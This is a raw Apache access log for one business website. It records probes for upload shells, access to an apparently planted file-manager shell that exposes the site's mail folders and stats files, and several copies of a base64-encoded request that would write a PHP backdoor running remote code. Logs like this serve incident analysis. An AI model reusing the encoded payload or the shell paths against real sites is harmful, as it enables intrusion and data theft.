66.249.64.109 - - [07/Dec/2025:06:02:11 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/sponsorship/ HTTP/1.1" 200 10786 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:02:33 +0000] "GET /aeee1/?fm=true&path=/home/i446698/tmp/awstats/ssl HTTP/1.1" 200 11567 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.108 - - [07/Dec/2025:06:02:38 +0000] "GET /aeee1/?fm=true&rename=cur&path=/home/i446698/mail/metalescrose.com/mediaenquiries/.Trash/ HTTP/1.1" 200 8129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:06:32 +0000] "GET /aeee1/?fm=true&rights=_usr_sbin_httpd_-V.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8137 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:06:58 +0000] "GET /aeee1/?fm=true&rights=maildirfolder&path=/home/i446698/mail/.Trash/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.217.237.240 - - [07/Dec/2025:06:04:28 +0000] "GET /wp-themes.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.217.237.240 - - [07/Dec/2025:06:04:28 +0000] "GET /x.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.217.237.240 - - [07/Dec/2025:06:04:28 +0000] "GET /yas.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
66.249.64.110 - - [07/Dec/2025:06:04:33 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/warranty/.spam/tmp HTTP/1.1" 200 8905 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:06:54 +0000] "GET /aeee1/?fm=true&rights=maildirfolder&path=/home/i446698/mail/.Trash/ HTTP/1.1" 200 8170 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:07:19 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9zZXVnaHR1bmdoZHl5c2hyeS9hZG1pbi9hc3NldHMvaW1hZ2VzL3RodW1icy9pbWc1LmpwZw== HTTP/1.1" 200 20316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:08:18 +0000] "GET /aeee1/?gz=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vZGlzdHJpYnV0aW9uL25ldw== HTTP/1.1" 200 6464 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:06:11:00 +0000] "GET / HTTP/1.1" 200 1725 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
66.249.64.109 - - [07/Dec/2025:06:11:05 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/contracts/.Trash/. HTTP/1.1" 200 9700 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:06:11:14 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:06:11:15 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:06:11:15 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
66.249.64.108 - - [07/Dec/2025:06:15:03 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9hcGV4LnppcA== HTTP/1.1" 200 140444 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:10:11 +0000] "GET /aeee1/?fm=true&rename=new&path=/home/i446698/mail/metalescrose.com/partnerships/.Drafts/ HTTP/1.1" 200 8130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:10:15 +0000] "GET /aeee1/?fm=true&rename=maildirsize&path=/home/i446698/mail/metalescrose.com/relations/ HTTP/1.1" 200 8183 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:06:11:15 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
66.249.64.109 - - [07/Dec/2025:06:11:50 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9zZXVnaHR1bmdoZHl5c2hyeS9hZG1pbi9hc3NldHMvaW1hZ2VzL3RodW1icy9pbWcyLmpwZw== HTTP/1.1" 200 28544 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:14:47 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvd2ViYWxpemVyL2hvdXJseV91c2FnZV8yMDI0MDEucG5n HTTP/1.1" 200 1845 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:01:35 +0000] "GET /aeee1/?fm=true&rights=dovecot-uidlist&path=/home/i446698/mail/metalescrose.com/relations/.spam/ HTTP/1.1" 200 8134 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:06:02:15 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.92 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:06:02:15 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.92 Safari/537.36"
66.249.64.110 - - [07/Dec/2025:06:03:42 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/hr/cur/. HTTP/1.1" 200 8907 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:06:04 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/warranty/.Junk/.. HTTP/1.1" 200 10617 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:07:51 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9teXNxbC1kYi1jb3VudC50YXI= HTTP/1.1" 200 115 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:09:45 +0000] "GET /aeee1/?fm=true&rights=maildirsize&path=/home/i446698/mail/metalescrose.com/relations/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:06:11:14 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
66.249.64.108 - - [07/Dec/2025:06:12:44 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udHJhY3RzL25ldy8xNzYyMTk5MTY2Lk05MDU0NTJQMTI5MDQ3MC5hbHRhcjQ1LnN1cHJlbWVwYW5lbDQ1LmNvbSxTPTYzNDEsVz02NTEw HTTP/1.1" 200 6457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:16:51 +0000] "GET /aeee1/?fm=true&edit=awstats.zip&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 856645 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:19:16 +0000] "GET /aeee1/?fm=true&edit=awstats072022.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 12635 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
37.112.223.135 - - [07/Dec/2025:06:21:30 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
37.112.223.135 - - [07/Dec/2025:06:21:31 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
37.112.223.135 - - [07/Dec/2025:06:21:31 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
66.249.64.108 - - [07/Dec/2025:06:24:10 +0000] "GET /aeee1/?fm=true&rights=cur&path=/home/i446698/mail/metalescrose.com/partnerships/.Drafts/ HTTP/1.1" 200 8161 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:12 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/hr/.Sent/cur HTTP/1.1" 200 8926 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:16 +0000] "GET /aeee1/?fm=true&rename=awstats092025.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:18 +0000] "GET /aeee1/?fm=true&rights=1762199219.M713004P819296.altar45.supremepanel45.com,S=6306,W=6475&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 8173 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:16:20 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9jb21wb3Nlci5sb2NrLnRhcg== HTTP/1.1" 200 3281 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:17:37 +0000] "GET /aeee1/?fm=true&rename=.customercare@metalescrose_com.tar&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8151 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:18:02 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/billing/.spam/new HTTP/1.1" 200 8899 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:18:16 +0000] "GET /aeee1/?fm=true&rights=1762199149.M320359P1290341.altar45.supremepanel45.com,S=6380,W=6549&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 8159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:19:25 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/warranty/tmp/.. HTTP/1.1" 200 10649 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:19:26 +0000] "GET /aeee1/?fm=true&rename=new&path=/home/i446698/mail/metalescrose.com/customercare/.Trash/ HTTP/1.1" 200 8178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.112.223.135 - - [07/Dec/2025:06:21:28 +0000] "GET / HTTP/1.1" 200 1726 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
37.112.223.135 - - [07/Dec/2025:06:21:29 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
37.112.223.135 - - [07/Dec/2025:06:21:31 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
66.249.64.108 - - [07/Dec/2025:06:23:47 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA1MjAyNS5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 9583 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:20:44 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA4MjAyNS5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 41455 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:23:58 +0000] "GET /aeee1/?fm=true&edit=1762199237.M484446P1290409.altar45.supremepanel45.com,S=6326,W=6495&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 10549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:01 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA2MjAyMi5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 4528 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:31 +0000] "GET /aeee1/?fm=true&rename=maildirfolder&path=/home/i446698/mail/metalescrose.com/billing/.spam/ HTTP/1.1" 200 8145 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:25:56 +0000] "GET /aeee1/?fm=true&rights=1762199237.M454356P1290435.altar45.supremepanel45.com,S=6271,W=6440&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 8213 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:26:39 +0000] "GET /aeee1/?fm=true&edit=awstats092025.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 17119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:27:18 +0000] "GET /aeee1/?fm=true&edit=awstats092022.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 13135 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:28:23 +0000] "GET /aeee1/?fm=true&rights=awstats082024.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:29:26 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA0MjAyMy5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 5413 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:30:35 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvd2ViYWxpemVyL3VzYWdlXzIwMjUwOS5odG1s HTTP/1.1" 200 7744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
